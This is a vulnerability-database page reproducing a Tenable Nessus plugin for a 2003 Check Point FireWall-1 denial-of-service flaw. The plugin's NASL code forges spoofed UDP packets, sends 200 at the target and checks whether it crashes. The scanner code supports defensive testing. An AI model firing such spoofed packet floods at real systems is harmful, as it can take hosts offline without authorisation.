Lucene search
K

Check Point FireWall-1 Spoofed UDP Packet Remote DoS

🗓️ 23 Oct 2003 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 23 Views

Check Point FireWall-1 is vulnerable to spoofed UDP packets causing remote denial of service.

Code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(11905);
 script_version("1.17");
 script_cvs_date("Date: 2018/08/08 12:52:14");

 script_bugtraq_id(1419);

 script_name(english:"Check Point FireWall-1 Spoofed UDP Packet Remote DoS");
 script_summary(english:"Flood the target with incorrect UDP packets");

 script_set_attribute(attribute:"synopsis", value:"The remote firewall is affected by a denial of service vulnerability.");
 script_set_attribute(attribute:"description", value:
"The machine (or a router on the way) crashed when it was flooded by
incorrect UDP packets. This attack was known to work against
FireWall-1 3.0, 4.0 or 4.1

An attacker may use this flaw to shut down this server, thus
preventing you from working properly.");
 script_set_attribute(attribute:"solution", value:
"If this is a FW-1, enable the antispoofing rule; Otherwise, contact
your software vendor for a patch.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value:"2003/10/23");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_FLOOD);
 script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
 script_family(english:"Firewalls");

 script_require_keys("Settings/ParanoidReport");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

if ( TARGET_IS_IPV6 ) exit(0);
if (report_paranoia < 2) audit(AUDIT_PARANOID);

id = rand() % 65535 + 1;
sp = rand() % 65535 + 1;
dp = rand() % 65535 + 1;

start_denial();

ip = forge_ip_packet(ip_v:4, ip_hl:5, ip_tos:0, ip_off: 0,
                     ip_p:IPPROTO_UDP, ip_id: id, ip_ttl:0x40,
	     	        ip_src: get_host_ip());
udp = forge_udp_packet(ip:ip, uh_sport: sp, uh_dport: dp, uh_ulen: 8+1, data: "X");

send_packet(udp, pcap_active: 0) x 200;

alive = end_denial();
if(!alive)
{
	security_warning();
	set_kb_item(name:"Host/dead", value:TRUE);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation